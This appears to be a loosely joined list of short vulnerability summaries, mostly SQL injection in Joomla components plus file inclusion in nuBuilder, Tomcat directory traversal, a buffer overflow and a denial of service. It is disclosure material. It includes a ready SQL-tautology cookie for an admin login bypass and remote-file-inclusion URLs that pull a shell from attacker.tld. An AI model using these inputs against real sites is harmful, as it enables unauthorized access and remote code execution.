An SQL injection vulnerability exists in the Joomla Galore Simple Shop component (com_simpleshop) due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability to inject arbitrary SQL commands into the application, allowing them to gain access to sensitive information such as usernames, passwords, and user types. The vulnerability is present in the 'index.php' file, where the 'id' parameter is not properly sanitized before being used in an SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable application.
Some parameters passed to controller.php when the task option is set respectively to save and validate, are not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
WM Downloader is prone to a buffer overflow vulnerability when processing specially crafted .m3u files. This vulnerability is due to a boundary error when copying user-supplied data into an insufficiently sized memory buffer. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
Some parameters passed to controller.php and imagehandler.php via POST when view is set to user and task is set to save_usercategory are not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
An attacker can bypass authentication by setting a cookie with the username set to 'admin' and the code set to 'c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;'
nuBuilder 10.04.x and lower is vulnerable to Remote File Inclusion. The vulnerable file is report.php which includes the $GLOBALS['StartingDirectory'] variable without any sanitization. This allows an attacker to inject malicious code into the application. The exploit can be tested against php config register_global = On and Off, allow_url_include = On. When register_global = Off, the exploit can be triggered by sending a request to http://site.tld/report.php?StartingDirectory=http://attacker.tld/shell.txt?. When register_global = On, the exploit can be triggered by sending a request to http://site.tld/report.php?GLOBALS[StartingDirectory]=http://attacker.tld/shell.txt?.
This exploit allows an attacker to traverse the directory structure of a vulnerable Apache Tomcat server and gain access to the /etc/passwd file. The exploit is based on a vulnerability in the UTF8 decoding of the server, which allows for directory traversal.
Some parameters passed to app.php when view is set to App and via POST in the vote form are not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
A local file inclusion vulnerability in nuBuilder 10.04.20 can be exploited to include arbitrary files.
The vulnerability is caused due to specifying a large value integer or string to the frame.frameBorder causing a dos and may lead to code execution.
Services By CQR